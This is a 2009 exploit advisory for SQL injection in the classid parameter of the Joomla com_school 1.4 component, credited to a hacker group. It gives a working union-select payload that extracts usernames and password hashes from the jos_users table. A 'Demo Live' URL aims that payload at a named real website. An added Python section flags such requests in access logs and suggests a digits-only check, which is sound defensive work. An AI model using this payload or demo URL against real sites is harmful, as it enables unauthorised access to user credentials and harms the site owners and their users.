Joomla Component com_school 1.4 (classid) SQL Injection Vulnerability

2009-06-08 17:32:09

----------------------------------------------------------------------
Joomla Component com_school (classid) SQL injection Vulnerability
----------------------------------------------------------------------

###################################################
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
###################################################

________________________________________________________

Example:

http://localHost/path/index.php?option=com_school&Itemid=null&func=showclass&classid=<Sql Code>

<Sql Code>:
-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*


Demo Live:
http://www.mariadecervello.com/index.php?option=com_school&Itemid=null&func=showclass&classid=-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*


+++++++++++++++++++++++++++++++++
[!] Produced in South America
------------------------------------


<name>school</name>
<creationDate>18 July 2006</creationDate>
<author>Soner (pisdoktor) Ekici - Alex Chaparro</author>
<copyright>
This component in released under the GNU/GPL License
</copyright>
<authorEmail>[email protected]</authorEmail>
<authorUrl>www.joomla.cl</authorUrl>
<version>1.4</version>
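
Added example (not part of the original advisory and not the component's own code): a Python check that flags com_school requests in a web access log whose classid is anything other than a plain integer, which is the shape the injection shown above depends on. The log lines, IP addresses, regular expression and function name are constructed for illustration, and the combined access-log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined format assumed); IPs are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [08/Jun/2009:17:40:01 +0000] "GET /index.php?option=com_school&Itemid=3&func=showclass&classid=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Jun/2009:17:41:13 +0000] "GET /index.php?option=com_school&Itemid=null&func=showclass&classid=-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/* HTTP/1.1" 200 7342 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Jun/2009:17:41:20 +0000] "GET /index.php?option=com_school&func=showclass&classid=-null%27%20union%20select%20null,null%20from%20jos_users%2F%2A HTTP/1.1" 200 7001 "-" "Mozilla/5.0"
192.0.2.44 - - [08/Jun/2009:17:42:02 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Client address and request target from one combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')


def suspicious_requests(log_text):
    """Return (client_ip, decoded classid) for com_school requests
    whose classid is not a plain non-negative integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        ip, target = m.groups()
        # parse_qs decodes '+' and %XX, so encoded variants are compared in decoded form
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_school" not in params.get("option", []):
            continue
        for value in params.get("classid", []):
            # Allowlist: a legitimate class id is digits only
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent non-numeric classid: {value!r}")
```

The same digits-only rule, applied server-side to classid before it reaches the database query, is the corresponding mitigation.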
